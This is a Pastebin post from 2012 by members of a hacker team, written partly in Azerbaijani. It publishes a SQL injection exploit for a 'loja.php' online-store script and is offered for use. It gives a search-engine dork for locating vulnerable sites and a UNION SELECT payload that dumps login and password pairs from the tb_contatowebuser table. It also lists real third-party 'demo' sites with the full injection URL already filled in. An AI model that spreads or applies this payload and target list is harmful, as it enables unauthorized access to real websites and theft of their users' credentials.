Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Video :
- http://www.youtube.com/watch?v=zXmNrTOeNrU&feature=youtu.be
- Source:
- #################################################################
- # In The Name Of ALLAH
- # Date : 2012-04-09
- # Author : Avatar [Fearless]
- # Subject : Loja SQL Inject Exploit
- # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Mexfi.ORG // Pwn.Me :D
- # Team`Z : AA Team // PC Team // MF Team // PWN Team :D // The Fear // UG Team
- # Greet'Z To : All Member'Z of the Team'Z
- # Respect To : All My Bro'Z
- # Language : Azerbaijani/English
- # Localation : Sweden/Sundsvall
- # Dork : inurl:"/loja.php?idCategoria="
- # Exploit : union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--
- #################################################################
- Let'Z Start :
- Salamlar... Bu Gun ki, Movzumda sizlere Loja SQL Inject Exploit-in gostereciyem elimizdekilere 1 baxaq
- ^
- |
- Yazdigim dork + Exploit[qeyd etdiyim] onlar ishe yarayir yani dork-la tapdigimiz saytlarin ekseriyyetinde hemin exploit ishleyir burdada exploit hakkinda
- melumat tapa bilersiniz [new6]
- Ve demeli ishe qoyular... Bunlar tekrar baxdiqlarim suphesini oyandirdisa deye mende cookies-leri temizlemeden 5-6 sehifeye kecdim ilk once exploit-den
- istifade edek sonra ozumuz manual yolla edek sizede aydin olar... burda ishlemedi... Bezen-de hayalkirikligi :D ok indide manual yolu yoxlayaq
- indi elimizdekileri deyerlendirek columnlara kecek
- # Table Name : tb_contatowebuser , tb_admin
- # Column Name : login,passwd
- indide exploitimizi hazirlayaq :D onda o biri tableye baxaq
- ve buda bizim pass+email[namideger login]-lerimiz indide bashqa cur baxaq USER ile
- demekki user columns-u bashqa tableye aidmish yada user tabledir :D indi 1 daha baxaq belede 1 deyishiklik yoxdu yani hazir bu gunluk bu qeder exploit
- uzre dersliyimizide hazirladiq nese sualiniz olsa buyurun Saygilarimla : Avatar [Fearless] :)
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- [+] Exploit :
- ########################################################################################################################
- # Exploit Title : Loja SQL Inject
- # Author : Baton2303 & Avatar [Fearless]
- # Date : 2012-04-29
- # Tested On : Windows 7 [Ultimate x86] / Linux
- # Localation : Sweden/Sundsvall ~~--~~ Azerbaijan/Baku
- # Language : English/Azerbaijani Language/
- # Software : http://thefear.in/loja.txt
- # Official : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D // Mexfi.ORG
- # Team'Z : AA Team // PC Team // MF Team // PWN Team :D //
- # Greet`Z To : All Member'Z Of The Team'Z
- ########################################################################################################################
- -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
- [-] How to :
- Dork : {inurl:"/loja.php?idCategoria="}
- [+] Exploit :
- http://localhost.com/loja.php?idCategoria=-1 union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--
- [union all select 1,2,3,4,5,group_concat(login,0x3a,passwd),4,5,6,7,8,9,10,11,12,13 from tb_contatowebuser--]
- [/?\] Demo Site's :
- http://www.paulobarsano.com/lojavirtual/loja.php?idCategoria=-1%20union%20all%20select%201,2,3,4,5,group_concat%28login,0x3a,passwd%29,7,8,9,10,11,12,13%20from%20tb_contatowebuser--
- http://yrev.com.br/lojavirtual/loja.php?idCategoria=-47%20union%20all%20select%201,2,3,4,5,group_concat%28login,0x3a,passwd%29,7,8,9,10,11,12,13%20from%20tb_contatowebuser--
- [<?>] Contact:
- [Mail>] : ~~avatar@hiphopfan.com~~ [A.k.A Avatar~Fearless]
- [Mail>] : ~~jey09@list.ru~~ [A.k.A Baton2303]
- Video : http://youtu.be/zXmNrTOeNrU
- -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement